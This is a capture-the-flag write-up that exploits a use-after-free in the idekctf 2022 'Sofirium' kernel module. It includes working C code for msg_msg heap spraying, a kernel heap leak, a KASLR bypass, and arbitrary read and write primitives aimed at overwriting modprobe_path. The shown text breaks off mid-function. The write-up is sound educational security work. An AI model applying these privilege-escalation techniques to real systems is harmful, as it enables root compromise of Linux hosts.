I was talking with a friend a few days ago about the lack of English-language writeups covering some of the more advanced kernel exploitation techniques. So, when the challenge he authored for the most recent edition of idekctf ended up with only 7 solves, I decided to release this writeup.

Info

There were a number of ‘unintended’ solves for this challenge caused by the infrastructure configuration. This writeup obviously ignores this, and focuses on a more ‘intended’ solution.

Sofirium was a pwn challenge in idekctf 2022. A full QEMU image was provided, along with the source code of an exploitable kernel module.

Info

You can download the challenge from the official idekctf 2022 repository here

There is a build.sh file, containing the command to start the QEMU virtual machine.

QEMU Build Script
#!/bin/sh
 
KERNEL_PATH="../bzImage"
 
if [ -z "$1" ]
then
    echo "NO CPIO"
    return 1
fi
 
if [ -z "$2" ]
then
    echo "NO EXPLOIT"
    qemu-system-x86_64 \
    -m 256M\
    -kernel $KERNEL_PATH \
    -initrd $1  \
    -cpu kvm64,+smep,+smap \
    -append "console=ttyS0 oops=panic panic=1 kpti=1 nokaslr quiet" \
    -monitor /dev/null \
    -serial mon:stdio \
    -virtfs local,path=/tmp,mount_tag=host0,security_model=passthrough,id=foobar \
    -nographic -s
else
    echo "YASS EXPLOIT"
    echo "Compiled $2"
    gcc -static $2 -o $2.c -lpthread
    qemu-system-x86_64 \
    -m 256M\
    -kernel $KERNEL_PATH \
    -initrd $1  \
    -cpu kvm64,+smep,+smap \
    -append "console=ttyS0 oops=panic panic=1 kpti=1 kaslr quiet" \
    -drive file=$2.c,format=raw \
    -monitor /dev/null \
    -serial mon:stdio \
    -virtfs local,path=/tmp,mount_tag=host0,security_model=passthrough,id=foobar \
    -nographic -s
fi

When an exploit source file is provided as the second argument to build.sh (this is how it runs on the challenge server), the following protections are enabled:

  • Kernel Address Space Layout Randomisation (KASLR): The kernel is loaded at a random address, preventing the kernel .text segment being easily accessible without a kernel leak.
  • Supervisor Mode Execution Prevention (SMEP): The CPU will fault if an attempt is made to execute instructions located in userspace while running in kernel mode (this prevents basic ret2usr attacks).
  • Supervisor Mode Access Prevention (SMAP): When the SMAP flag in the CR4 control register is set, the CPU faults if kernel code accesses userland memory outside of explicitly permitted windows (such as copy_from_user).
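The only difference between the two branches of build.sh that matters here is the kernel command line: one passes nokaslr, the other kaslr. As a minimal sketch (the helper names are my own, not part of the challenge), this is how the two strings can be told apart by matching whole words. A naive substring search would find "kaslr" inside "nokaslr".

```c
#include <stdbool.h>
#include <stddef.h>
#include <string.h>

/* Returns true if `token` appears in `cmdline` as a whole space-separated
 * word. A plain strstr() would wrongly find "kaslr" inside "nokaslr". */
static bool cmdline_has_token(const char *cmdline, const char *token)
{
    size_t tlen = strlen(token);
    const char *p = cmdline;

    while (*p != '\0') {
        while (*p == ' ')
            p++;                       /* skip separators */
        size_t wlen = strcspn(p, " "); /* length of the current word */
        if (wlen == tlen && strncmp(p, token, tlen) == 0)
            return true;
        p += wlen;
    }
    return false;
}

/* KASLR is treated as disabled only when "nokaslr" is passed explicitly. */
static bool kaslr_disabled(const char *cmdline)
{
    return cmdline_has_token(cmdline, "nokaslr");
}
```

Feeding it the two -append strings from build.sh reports KASLR as disabled for the first branch and enabled for the second.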

Kernel Module Overview

The device is made accessible to userland via an interface with 4 operations. These are defined in a file ops struct.

struct file_operations fops = {
    .open = device_open,
    .unlocked_ioctl = device_ioctl,
    .compat_ioctl = device_ioctl,
    .release = device_release,
};

Info

If you’re not familiar with the ioctl syscall, I recommend reading this article as an introduction. Essentially, it gives kernel drivers a versatile, programmable interface through which userland can request custom operations.

The initialisation function simply registers the device with the kernel and prints some kernel log messages. The theme of the challenge seems to revolve around blockchain, though that has no relevance to the exploitation of the challenge itself.

Info

Every device in Linux is identified by a major and minor number. The kernel uses the major number to identify the driver associated with a device; the driver uses minor numbers to identify individual devices belonging to it.

int init_module(void) {
    Major_num = register_chrdev(0, proc_name, &fops);
    if (Major_num < 0) {
        printk(KERN_INFO "Failed to register device, major num returned %d",
        Major_num);
        return Major_num;
    }
    printk(KERN_INFO "Sucessfully registered device, major num returned %d", Major_num);
    printk(KERN_INFO "'mknod /dev/%s c %d 0'.\n", proc_name, Major_num);
 
    printk(KERN_INFO "Welcome to Sofirium, the greatest blockchain to exist");
    return 0;
}
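The module logs a mknod hint containing the major number it was given. As a rough sketch of what that hint amounts to in C (the function names are hypothetical, and creating the node needs root), the major and minor numbers are packed into a single dev_t with makedev:

```c
#define _DEFAULT_SOURCE
#include <sys/stat.h>
#include <sys/sysmacros.h>
#include <sys/types.h>

/* Packs the driver's major number and minor 0 into a device number. */
static dev_t sofirium_devnum(unsigned int major_num)
{
    return makedev(major_num, 0);
}

/* Equivalent of `mknod <path> c <major> 0`. Returns 0 on success, -1 on
 * error (for example when not running as root). */
static int create_sofirium_node(const char *path, unsigned int major_num)
{
    return mknod(path, S_IFCHR | 0666, sofirium_devnum(major_num));
}
```

The major() and minor() macros from the same header recover the two halves again, which is handy when checking an existing node with stat.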

The cleanup, open, and release functions do not contain any particularly interesting code.

The device_ioctl Function

The bulk of the functionality is contained in the device_ioctl function. It takes 3 arguments: a file pointer, an ioctl command code, and an argument. The command is used to determine which operation to perform, and the argument is a pointer to a request struct defined in the kernel module header source.

typedef struct request{
    int idx;
    char buffer[CHUNK_SIZE];
} request;
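To make the layout concrete, here is a small sketch of the same struct in userland, assuming CHUNK_SIZE is 0x100 (the value used by the exploit code later in this writeup). The make_request helper is my own addition: it zero-fills the buffer and never reads more bytes than the caller supplies.

```c
#include <stddef.h>
#include <string.h>

#define CHUNK_SIZE 0x100 /* assumption: value taken from the exploit code */

typedef struct request {
    int idx;
    char buffer[CHUNK_SIZE];
} request;

/* Offset of the data buffer inside the struct that is passed to ioctl. */
static size_t request_buffer_offset(void)
{
    return offsetof(request, buffer);
}

/* Builds a zero-padded request, copying at most CHUNK_SIZE bytes. */
static request make_request(int idx, const void *data, size_t len)
{
    request req;

    memset(&req, 0, sizeof(req));
    req.idx = idx;
    if (len > CHUNK_SIZE)
        len = CHUNK_SIZE;
    memcpy(req.buffer, data, len);
    return req;
}
```

On x86_64 the buffer starts 4 bytes into the struct, which is the offset the driver adds to arg when it copies chunk data to and from userland.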

It first copies the request struct from userland into kernel space using copy_from_user.

long device_ioctl(struct file *filp, unsigned int cmd, unsigned long arg) {
    sofirium_entry* next;
    sofirium_entry* new;
    sofirium_entry* target;
    sofirium_entry* tmp;
    request req;
    int total_nft;
 
    if (copy_from_user(&req, (void*)arg, sizeof(request))) {
        printk(KERN_INFO "Copy Request from User Error");
        return -EFAULT;
    }

A switch statement then dispatches on the ioctl command code (0x1337, 0xdeadbeef, 0xcafebabe or 0xbabecafe), and the driver performs one of the following operations.

Operation 0x1337

The 0x1337 command frees the head struct and then every chunk in its linked list by following each chunk’s next pointer. An interesting thing to note here is that neither the global head pointer nor the pointers in the linked list are cleared after the chunks are freed, which could potentially lead to a use-after-free.

case 0x1337:
    debug_print(KERN_INFO "Deleting Blockchain: Sofirium is Bad");
 
    next = head->head;
    total_nft= head->total_nft;
    kfree(head);
 
    for (int i = 0; i < total_nft; i ++){
        debug_print(KERN_INFO "Freeing Buffer 0x%px\nNEXT: 0x%px", tmp, next->next);
        tmp = next;
        next = next->next;
        kfree(tmp);
    }
 
    return 1;

Operation 0xdeadbeef

The 0xdeadbeef command controls the chunk allocation logic. The first thing it does is check if the head pointer is NULL. If so, a sofirium_head struct is allocated and initialised. Then, if the list is empty (total_nft is 0), a sofirium_entry struct is allocated and head->head is set to point to it. Otherwise, the list is walked to its last entry, a new sofirium_entry struct is allocated, and the next pointer of that last entry is set to point to it.

case 0xdeadbeef:
 
    if (head == NULL){
        head = kmalloc(sizeof(sofirium_head), GFP_KERNEL);
        head->total_nft = 0;
        strlcpy(head->coin_art, sofirium_art, sizeof(head->coin_art));
 
        printk(KERN_INFO "%s", head->coin_art);
 
        head->head = NULL;
        debug_print(KERN_INFO "Head NULL, Creating sofirium_head at 0x%px", head);
    }
 
    if (head->total_nft == 0){
        new = kmalloc(sizeof(sofirium_entry), GFP_KERNEL);
        new->next = NULL;
        memcpy(new->nft, req.buffer, CHUNK_SIZE);
        head->head = new;
        head->total_nft = 1;
    }
 
    else{
        target = head->head;
        for (int i=1; i < head->total_nft; i++){
            target = target->next;
        }
        new = kmalloc(sizeof(sofirium_entry), GFP_KERNEL);
        new->next = NULL;
        memcpy(new->nft, req.buffer, CHUNK_SIZE);
        target->next = new;
        head->total_nft ++;
    }
 
    debug_print(KERN_INFO "NEW NFT: %s @ 0x%px \n",new->nft, new);
    return head->total_nft;

Operation 0xcafebabe

The 0xcafebabe command is used to read the contents of a chunk. It iterates over the linked list until the idx specified in the request struct argument is reached. The nft attribute of that chunk is then copied directly into the buffer field of the userland request struct using copy_to_user. Note that idx is never checked against total_nft.

case 0xcafebabe:
    target = head->head;
    for (int i=0; i < req.idx; i++){
        debug_print(KERN_INFO "Walked over entry 0x%px", target->next);
        target = target->next;
    };
 
 
 
    debug_print(KERN_INFO "Copy to user %s @ 0x%px", target->nft, target->nft);
    if(copy_to_user((void*)arg+offsetof(struct request, buffer),target->nft, sizeof(target->nft))){
        printk(KERN_INFO "Copy to user failed, exiting");
        return -EFAULT;
    }
    return 0;

Operation 0xbabecafe

The 0xbabecafe command provides functionality to alter the contents of a chunk. Similar to the 0xcafebabe command, first the linked list is iterated over until the idx specified in the request struct argument is reached. Once the correct chunk has been identified, copy_from_user is used to copy the contents of the buffer attribute of the request struct into the nft attribute of the chunk.

case 0xbabecafe:
    target = head->head;
    for (int i=0; i < req.idx; i++){
        debug_print(KERN_INFO "Walked over entry %px", target->next);
        target = target->next;
    };
 
    if(copy_from_user(target->nft, (void*)arg+offsetof(struct request, buffer),sizeof(target->nft))){
        printk(KERN_INFO "Copy from user failed exiting");
        return -EFAULT;
    }
    debug_print(KERN_INFO "Copy from user %s to 0x%px", target->nft, target->nft);
 
    return 0;
default:
    return 0xffff;
}

Summary of Findings

A few things can be deduced from the code:

  • There is a use-after-free bug, which may allow the read (0xcafebabe) and edit (0xbabecafe) operations to be used on freed chunks.
    • Combined with 0xcafebabe, this could be used to leak kernel memory.
    • Combined with 0xbabecafe, this could be used to overwrite kernel memory.
  • These primitives combined should be enough to achieve arbitrary code execution.

Exploitation

To leverage the UAF into something useful, some infoleaks are required. Since the QEMU VM has been configured with the full myriad of protections, leaking the kernel base is essential, which will probably require first leaking the kernel heap.

Kernel Heap Leak

Acquiring a kernel heap leak required a fairly comprehensive understanding of the kernel’s heap allocator and how various structures are used by the kernel. The Linux kernel allocator works differently to the libc allocator (which you would be familiar with from most userland based heap exploitation challenges), so first I’ll give a brief overview of how the kernel allocator works.

The Linux kernel (currently) uses two allocators for handling dynamic kernel memory: the buddy allocator and the slab allocator. The important allocator for this challenge is the slab allocator. The slab allocator is made up of a number of caches, of which there are two types:

  • General purpose caches, sorted mostly into powers of 2 (e.g. kmalloc-64, kmalloc-128, kmalloc-256).
  • Specialised caches, used for commonly used structures such as struct task_struct or struct mm_struct.

The 0x100 chunk allocated by the target kernel driver will come from the kmalloc-256 cache.
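As a rough sketch of how a request size maps onto a general purpose cache, the lookup below picks the smallest cache that fits. The size table is an assumption based on a typical x86_64 build (including the 96 and 192 byte caches); the exact set depends on the kernel configuration, and the function name is my own.

```c
#include <stddef.h>

/* General purpose cache sizes on a typical x86_64 build (assumption). */
static const size_t kmalloc_sizes[] = {
    8, 16, 32, 64, 96, 128, 192, 256, 512, 1024, 2048, 4096, 8192
};

/* Returns the object size of the smallest kmalloc-N cache that can hold
 * `size` bytes, or 0 if the request is empty or too large for the table. */
static size_t kmalloc_cache_for(size_t size)
{
    size_t count = sizeof(kmalloc_sizes) / sizeof(kmalloc_sizes[0]);

    if (size == 0)
        return 0;
    for (size_t i = 0; i < count; i++) {
        if (size <= kmalloc_sizes[i])
            return kmalloc_sizes[i];
    }
    return 0;
}
```

The practical point is that any object which rounds up to the same cache can be used to reclaim a freed chunk, which is what the msg_msg spray later relies on.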

Info

Rather than me butchering an explanation of these allocators, I’d recommend reading this awesome article.

I found an article that describes some structures used to achieve various types of kernel manipulation, one such structure is msg_msg. To understand why, a dive into the kernel source code is required.

The msg_msg structure

The msg_msg struct is used by multiple system calls, such as msgsnd, msgrcv, msgctl and msgget. The struct is stored in the kernel heap, and is defined as follows:

struct msg_msg {
    struct list_head m_list;
    long m_type;
    size_t m_ts;    /* message text size */
    struct msg_msgseg *next;
    void *security;
    /* the actual message follows immediately */
};

When a msgsnd system call is made, execution jumps into the corresponding kernel function do_msgsnd.

long do_msgsnd(int msqid, long mtype, void __user *mtext,
size_t msgsz, int msgflg)
{
[...]
    ns = current->nsproxy->ipc_ns;
 
    if (msgsz > ns->msg_ctlmax || (long) msgsz < 0 || msqid < 0)
            return -EINVAL;
    if (mtype < 1)
            return -EINVAL;
 
    msg = load_msg(mtext, msgsz); <-- calls load_msg to retrieve message from userland
[...]

do_msgsnd calls the load_msg function, providing a pointer to the userland buffer containing the message.

struct msg_msg *load_msg(const void __user *src, size_t len)
{
    struct msg_msg *msg;
    struct msg_msgseg *seg;
    int err = -EFAULT;
    size_t alen;
 
    msg = alloc_msg(len);
    if (msg == NULL)
        return ERR_PTR(-ENOMEM);

    alen = min(len, DATALEN_MSG);
    if (copy_from_user(msg + 1, src, alen)) <-- data is retrieved from userland
        goto out_err;

    for (seg = msg->next; seg != NULL; seg = seg->next) {
        len -= alen;
        src = (char __user *)src + alen;
        alen = min(len, DATALEN_SEG);
        if (copy_from_user(seg + 1, src, alen)) <-- again here
            goto out_err;
    }
[...]

The data is copied from userland into the msg_msg struct named msg using copy_from_user.

Warning

One important limitation of this structure in terms of exploitation: the first 48 bytes of the msg_msg struct are used for storing metadata, and the actual message data is stored after the 48-byte mark. It’s worth remembering the 48 bytes of uncontrolled data preceding the user-controlled buffer when trying to leverage msg_msg for infoleaks or write primitives.
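The 48-byte figure falls straight out of the struct definition on a 64-bit system. The sketch below mirrors the header in userland (the _model names are mine, and the mirror assumes an LP64 target) and shows the two bits of arithmetic the exploit needs: how much message text fills a given cache, and where a word of message text lands inside the slab object.

```c
#include <stddef.h>

/* Userland mirror of the kernel header, for size arithmetic only. */
struct list_head_model {
    void *next, *prev;
};

struct msg_msg_model {
    struct list_head_model m_list;
    long m_type;
    size_t m_ts;
    void *next;
    void *security;
};

/* Bytes of message text needed so that header plus text fill `cache_size`.
 * The caller must pass a cache size larger than the header. */
static size_t mtext_len_for_cache(size_t cache_size)
{
    return cache_size - sizeof(struct msg_msg_model);
}

/* Offset inside the slab object of the idx-th 8-byte word of message text. */
static size_t chunk_offset_of_mtext_word(size_t idx)
{
    return sizeof(struct msg_msg_model) + idx * 8;
}
```

With these numbers, 80 bytes of text fill a 0x80-byte object, which matches the MSG_SIZE macro (CHUNK_SIZE / 2 - 48) in the exploit code, and word 8 of the text sits at offset 0x70 of the object.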

So, to leverage msg_msg to gain an infoleak with the UAF:

  1. Allocate a kernel chunk using the kernel driver operation 0xdeadbeef (always chunk size 0x100)
  2. Free the kernel object.
  3. Spray msg_msg structs of size 0x100 into the kernel heap via the msgget and msgsnd system calls. One of the structs should occupy the chunk just freed.
  4. Allocate a chunk using the 0xdeadbeef operation. Due to the UAF, the kernel driver will write the address of the newly allocated chunk into the freed chunk’s next field, which is now actually part of a msg_msg struct.
  5. Use the msgrcv system call to copy the msg_msg struct into userland. The struct now contains a pointer to a sofirium_entry struct, so a kernel heap address will be copied into userland where we can read it.
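The steps above can be modelled entirely in userland with a toy allocator. This is only a sketch: the LIFO free list stands in for the slab cache (the real allocator has per-CPU lists and optional hardening), the 0x70 offset is inferred from the exploit reading word 8 of the message text, and the "pointer" value is made up.

```c
#include <string.h>

#define SLOT_SIZE 128
#define NUM_SLOTS 4

static unsigned char slots[NUM_SLOTS][SLOT_SIZE];
static int free_stack[NUM_SLOTS] = {3, 2, 1, 0}; /* top of stack is last */
static int free_top = NUM_SLOTS;

/* Pops the most recently freed slot, or returns -1 if none is left. */
static int toy_alloc(void)
{
    return free_top > 0 ? free_stack[--free_top] : -1;
}

/* Pushes a slot back; the caller's copy of the index is left dangling. */
static void toy_free(int slot)
{
    if (free_top < NUM_SLOTS)
        free_stack[free_top++] = slot;
}

/* Walks through steps 1 to 5 and returns the value userland would see. */
static unsigned long long demo_leak(void)
{
    int victim = toy_alloc();          /* 1. driver allocates its object  */
    toy_free(victim);                  /* 2. freed, index kept (the UAF)  */

    int msg = toy_alloc();             /* 3. sprayed message reuses slot  */
    memset(slots[msg], 0, SLOT_SIZE);

    /* 4. driver writes a pointer through the dangling index */
    unsigned long long fake_ptr = 0xffff888000c0ffeeULL; /* made-up value */
    memcpy(&slots[victim][0x70], &fake_ptr, sizeof(fake_ptr));

    /* 5. reading the message back returns the driver's pointer */
    unsigned long long leaked;
    memcpy(&leaked, &slots[msg][0x70], sizeof(leaked));
    return leaked;
}
```

Because the free list is last-in first-out, the message lands in exactly the slot the driver still points at, so the driver's write shows up in data that userland is allowed to receive.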

Inversely, the msgrcv system call causes a jump into the do_msgrcv function. If the MSG_COPY flag is set, the kernel will call prepare_copy.

static long do_msgrcv(int msqid, void __user *buf, size_t bufsz, long msgtyp, int msgflg,
long (*msg_handler)(void __user *, struct msg_msg *, size_t))
{
    int mode;
    struct msg_queue *msq;
    struct ipc_namespace *ns;
    struct msg_msg *msg, *copy = NULL;
    DEFINE_WAKE_Q(wake_q);
 
    ns = current->nsproxy->ipc_ns;
 
    if (msqid < 0 || (long) bufsz < 0)
        return -EINVAL;
 
    if (msgflg & MSG_COPY) { <-- MSG_COPY must be set
        if ((msgflg & MSG_EXCEPT) || !(msgflg & IPC_NOWAIT))
            return -EINVAL;
        copy = prepare_copy(buf, min_t(size_t, bufsz, ns->msg_ctlmax)); <-- to call prepare_copy
        if (IS_ERR(copy))
            return PTR_ERR(copy);
    }
    mode = convert_mode(&msgtyp, msgflg);
[...]

prepare_copy allocates the copy struct. Later in do_msgrcv, copy_msg fills it in, which is interesting because it uses memcpy to copy the message data into the copy struct.

struct msg_msg *copy_msg(struct msg_msg *src, struct msg_msg *dst)
{
    struct msg_msgseg *dst_pseg, *src_pseg;
    size_t len = src->m_ts;
    size_t alen;
 
    if (src->m_ts > dst->m_ts)
        return ERR_PTR(-EINVAL);
 
    alen = min(len, DATALEN_MSG);
    memcpy(dst + 1, src + 1, alen); <-- memcpy is used to replicate the structure
 
    for (dst_pseg = dst->next, src_pseg = src->next;
         src_pseg != NULL;
         dst_pseg = dst_pseg->next, src_pseg = src_pseg->next) {
 
        len -= alen;
        alen = min(len, DATALEN_SEG);
        memcpy(dst_pseg + 1, src_pseg + 1, alen);
    }
 
[...]

store_msg is eventually called to copy the msg_msg object’s data back into userland via copy_to_user.

int store_msg(void __user *dest, struct msg_msg *msg, size_t len)
{
    size_t alen;
    struct msg_msgseg *seg;

    alen = min(len, DATALEN_MSG);
    if (copy_to_user(dest, msg + 1, alen)) <-- copy back into userland
        return -1;

    for (seg = msg->next; seg != NULL; seg = seg->next) {
        len -= alen;
        dest = (char __user *)dest + alen;
        alen = min(len, DATALEN_SEG);
        if (copy_to_user(dest, seg + 1, alen))
            return -1;
    }
    return 0;
}
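The segment loops in load_msg, copy_msg and store_msg only come into play for large messages. A small sketch of the arithmetic, assuming 4096-byte pages, the 48-byte msg_msg header and an 8-byte msg_msgseg header (a single next pointer); the _MODEL names and the function are my own:

```c
#include <stddef.h>

#define PAGE_SIZE_MODEL   4096
#define DATALEN_MSG_MODEL (PAGE_SIZE_MODEL - 48) /* page minus msg_msg header    */
#define DATALEN_SEG_MODEL (PAGE_SIZE_MODEL - 8)  /* page minus msg_msgseg header */

/* Number of extra msg_msgseg chunks needed for a message of `len` bytes. */
static size_t msg_segments(size_t len)
{
    size_t segs = 0;

    if (len <= DATALEN_MSG_MODEL)
        return 0;               /* everything fits after the main header */

    len -= DATALEN_MSG_MODEL;
    while (len > 0) {
        size_t alen = len < DATALEN_SEG_MODEL ? len : DATALEN_SEG_MODEL;
        len -= alen;
        segs++;
    }
    return segs;
}
```

The 80-byte messages sprayed in this writeup never need a segment, so the next field of each sprayed msg_msg stays NULL and only the first copy in each function is exercised.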

With this knowledge, it becomes clear how to leverage this structure to gain an arbitrary write primitive when combined with a UAF.

  1. Allocate a kernel chunk using the kernel driver operation 0xdeadbeef (always chunk size 0x100)
  2. Free the kernel object.
  3. Spray msg_msg structs of size 0x100 into the kernel heap via the msgget and msgsnd system calls. One of the structs should occupy the chunk just freed. The data in the msg_msg struct contains the address to overwrite, which will be the target->nft attribute of the freed chunk.
  4. Write into the free chunk using the 0xbabecafe command, copy_from_user will copy the data from request->buffer into the address pointed to by target->nft.

The following code leaks the heap reliably.

kernel heap leak
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <string.h>
#include <fcntl.h>
#include <sys/msg.h>
#include <sys/timerfd.h>
#include <sys/ioctl.h>
#include <sys/syscall.h>
 
 
#define CHUNK_SIZE 0x100
#define MSG_SIZE (CHUNK_SIZE / 2 - 48) // msg_msg has a 48 byte header
#define MSG_SPRAY_SIZE 0x10
 
#define IOCTL_DESTROY 0x1337
#define IOCTL_ALLOC 0xdeadbeef
#define IOCTL_READ 0xcafebabe
#define IOCTL_EDIT 0xbabecafe
 
// #define DEBUG
#if defined DEBUG
#define LOG(fmt, ...)    printf(fmt, __VA_ARGS__);
#else
#define LOG(fmt, ...)    /* empty when debugging disabled */
#endif
 
int module_fp;
int msqid_array[MSG_SPRAY_SIZE];
 
typedef struct request{
    int idx;
    char buffer[CHUNK_SIZE];
} request;
 
// https://elixir.bootlin.com/linux/v4.19.98/source/include/linux/msg.h#L9
typedef struct msg_msg_struct {
    long mtype;
    char mtext[MSG_SIZE];
} msg_msg_struct;
 
 
void free_blockchain()
{
    struct request request_struct;
    request_struct.idx = '\x00';
 
    LOG("%s Freeing blockchain\n", "[DEBUG]");
    long ioctl_return = ioctl(module_fp, IOCTL_DESTROY,&request_struct);
    if ( ioctl_return < 0 )
    {
        printf("[CRITICAL] Something went wrong freeing blockchain\n");
        exit(1);
    }
}
 
int alloc(char *buffer){
    /* Use 0xdeadbeef command to allocate a chunk */
    struct request request_struct;
    request_struct.idx = 0;
 
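    /* Zero the buffer and copy at most CHUNK_SIZE - 1 bytes, so short string
       arguments such as "FOOBAR" are not read past their end. */
    memset(request_struct.buffer, 0, CHUNK_SIZE);
    strncpy(request_struct.buffer, buffer, CHUNK_SIZE - 1);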
    long ioctl_return = ioctl(module_fp, IOCTL_ALLOC,&request_struct);
    if ( ioctl_return < 0 )
    {
        printf("[CRITICAL] Something went wrong allocating chunk. Got chunk index %ld\n\n", ioctl_return);
        exit(1);
    }
    else
        LOG("%s allocating chunk. Got return code %ld\n\n", "[DEBUG]", ioctl_return);
 
    return ioctl_return;
}
 
 
void spray_msg_msg(char *buffer)
{
    /* Spray msg_msg structs into the kernel heap */
    struct msg_msg_struct msg;
    msg.mtype = 1;
    memcpy(msg.mtext, buffer, MSG_SIZE);
    msg.mtext[MSG_SIZE - 1] = 0;
 
    puts("[INFO] Spraying msg_msg struct into kernel heap");
    for(int i = 0; i < MSG_SPRAY_SIZE; i ++)
    {
        msqid_array[i] = msgget(IPC_PRIVATE, 0644  | IPC_CREAT);
        msgsnd(msqid_array[i], &msg, sizeof(msg.mtext), 0);
    }
}
 
unsigned long long leak_heap(){
    int i;
 
    char cruff_buf[MSG_SIZE];
    memset(cruff_buf, 0, MSG_SIZE);
    spray_msg_msg(cruff_buf);
 
    alloc("FOOBAR");
    puts("[INFO] Freeing msg_msg chunks from kernel heap");
    msg_msg_struct msg;
    for(i = 0; i < MSG_SPRAY_SIZE; i ++){
        if(msgrcv(msqid_array[i], &msg, sizeof(msg.mtext), 1, IPC_NOWAIT ) < 0)
        {
            puts("[CRITICAL] msgrcv failed");
            exit(1);
        }
 
        if(((long long*)msg.mtext)[8] != 0){
            return ((long long*)msg.mtext)[8];
        }
    }
 
    puts("[CRITICAL] No leak found! Exiting");
    exit(1);
}
 
int main(int argc, char *argv[])
{
    module_fp = open("/dev/Sofire", O_RDONLY);
    if (module_fp < 0) {
        perror("[CRITICAL] open /dev/Sofire");
        return 1;
    }
 
    alloc("\x00");
    free_blockchain();
 
    unsigned long long heap_leak = leak_heap();
    printf("[SUCCESS] Kernel heap leak: 0x%llx\n", heap_leak);
}

With the heap leak finished, we can move on to leaking the kernel base.

[Figure: Kernel heap leak]

Leaking the Kernel Base

Initially, I spent a while trying to groom the heap so that timerfd_ctx structs were allocated at a consistent offset from the leaked heap address. They are of size 0x100 as well, so I had hoped that spraying a large number of timers into the heap would cause some to land near the target chunk. However, I was unable to get this to work reliably, possibly due to the effects of the heap corruption caused while getting the heap leak. If you have tips on how to do this effectively, or know what I might have been doing wrong, please contact me!

Since the CTF is running inside a BusyBox VM, it’s not particularly active. This means I was able to simply scan the heap in GDB looking for other structures, and found that pointers to sysfs_file_kfops_rw were littered throughout the heap.

Running the heap leak exploit code:

One such structure exists at an offset of 0xcc0 from the heap leak.

[Figure: sysfs_file_kfops_rw pointer]

I created two additional functions for the read primitive. One of them is a generic arbitrary_primitive function, written so that the same code can be reused by the write primitive when we get to it.

unsigned long long *arbitrary_primitive(unsigned long long *payload, unsigned long long addr)
{
 
    payload[8] = addr - 8;
 
    spray_msg_msg((char *)payload);
    return payload;
}
 
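void arbitrary_read(unsigned long long addr, unsigned long long *leaks){
    unsigned long long payload[0x100] = {0}; /* zeroed so the spray carries no stack garbage */

    arbitrary_primitive(payload, addr);

    char *data = read_chunk(0);
    memcpy(leaks, data, 0x100);
    free(data); /* read_chunk returns a malloc'd copy */
}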
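The addr - 8 in arbitrary_primitive deserves a word. My reading is that the driver adds the offset of nft to whatever pointer it finds, so the planted pointer has to be pulled back by that offset. The model below shows the idea on a plain byte array standing in for kernel memory. It assumes nft sits 8 bytes into a sofirium_entry (right after the next pointer), which is inferred from the exploit rather than taken from the module header, and all names are hypothetical.

```c
#include <stddef.h>
#include <string.h>

#define NFT_OFFSET 8 /* assumption: nft follows the 8-byte next pointer */

static unsigned char fake_kmem[256]; /* stand-in for kernel memory */

/* Models the driver's edit operation: it writes to target->nft, which is
 * the entry address plus NFT_OFFSET. */
static void driver_edit(size_t target, const void *src, size_t len)
{
    memcpy(&fake_kmem[target + NFT_OFFSET], src, len);
}

/* Plants a fake entry pointer so that the driver's write lands on `addr`.
 * Returns 0 on success, -1 if the write would leave the model's memory. */
static int model_arbitrary_write(size_t addr, const void *src, size_t len)
{
    if (addr < NFT_OFFSET || addr > sizeof(fake_kmem) ||
        len > sizeof(fake_kmem) - addr)
        return -1;

    size_t fake_entry = addr - NFT_OFFSET; /* value carried by the spray */
    driver_edit(fake_entry, src, len);
    return 0;
}
```

The read primitive works the same way, with the driver copying out of target->nft instead of into it.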

By extending the main function to execute the arbitrary read, we get a reliable kernel leak.

arbitrary_read(heap_leak + 0xcc0, leaks);
printf("[SUCCESS] Leaked sysfs_file_kfops_rw: 0x%llx\n", leaks[0]);
 
unsigned long long kernel_base = leaks[0] - SYSFS_FILE_KFOPS_RW_OFFSET;
unsigned long long modprobe_address = kernel_base + MODPROB_PATH_OFFSET;
 
printf("[+] Calculated the kernel base: 0x%llx\n", kernel_base);
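The base calculation is plain pointer arithmetic, so it is worth sanity checking the result before writing anywhere. A sketch of that check, using the two offsets defined in the final exploit (they are only valid for this exact kernel build); the helper names and the plausibility rule are my own, the latter being a loose heuristic rather than a guarantee:

```c
#include <stdbool.h>
#include <stdint.h>

/* Offsets from the final exploit; specific to this kernel build. */
#define SYSFS_FILE_KFOPS_RW_OFFSET 0x1227720ULL
#define MODPROB_PATH_OFFSET        0x1851400ULL

static uint64_t kernel_base_from_leak(uint64_t leak)
{
    return leak - SYSFS_FILE_KFOPS_RW_OFFSET;
}

static uint64_t modprobe_path_addr(uint64_t base)
{
    return base + MODPROB_PATH_OFFSET;
}

/* Loose check: the x86_64 kernel image is mapped at or above
 * 0xffffffff80000000, and the base should be well aligned (1 MiB is
 * used here as a conservative assumption). */
static bool plausible_kernel_base(uint64_t base)
{
    return base >= 0xffffffff80000000ULL && (base & 0xfffffULL) == 0;
}
```

If the word read from the heap is not actually a sysfs_file_kfops_rw pointer, the computed base will almost always fail this check, which is a cheaper way to find out than a kernel panic.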

[Figure: Read primitive works]

Kernel Write Primitive

The theory for the write primitive has already been discussed; only a little more code is required to add the functionality to the exploit script.

modprobe_path

modprobe_path is a global variable in the kernel which specifies the path to the modprobe program. It’s accessible to userland via the /proc/sys/kernel/modprobe file. As explained in this blog, when an execve call is made on a file with an unknown file signature, an execution chain is triggered which ends in a call to call_modprobe. Essentially, whichever file is specified in the modprobe_path global variable will be executed by the kernel, with root privileges.
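Two files are needed to use this trick: a helper script for the kernel to run, and a dummy file whose first bytes match no known executable format. The final exploit creates them with system and echo; the sketch below does the same with plain file I/O. The function names are hypothetical, and the script body matches the one used in the exploit.

```c
#define _DEFAULT_SOURCE
#include <fcntl.h>
#include <stddef.h>
#include <sys/stat.h>
#include <sys/types.h>
#include <unistd.h>

/* Writes `len` bytes to `path` and marks the file executable.
 * Returns 0 on success, -1 on any failure. */
static int write_executable(const char *path, const void *data, size_t len)
{
    int fd = open(path, O_WRONLY | O_CREAT | O_TRUNC, 0755);
    if (fd < 0)
        return -1;

    ssize_t written = write(fd, data, len);
    int rc = (written == (ssize_t)len) ? 0 : -1;

    if (close(fd) != 0)
        rc = -1;
    if (rc == 0 && chmod(path, 0755) != 0) /* umask may have stripped bits */
        rc = -1;
    return rc;
}

/* Creates the helper script and the dummy file with an unknown signature. */
static int stage_modprobe_files(const char *helper_path, const char *dummy_path)
{
    static const char helper[] = "#!/bin/sh\nchmod 777 /flag.txt\n";
    static const unsigned char magic[] = {0xff, 0xff, 0xff, 0xff};

    if (write_executable(helper_path, helper, sizeof(helper) - 1) != 0)
        return -1;
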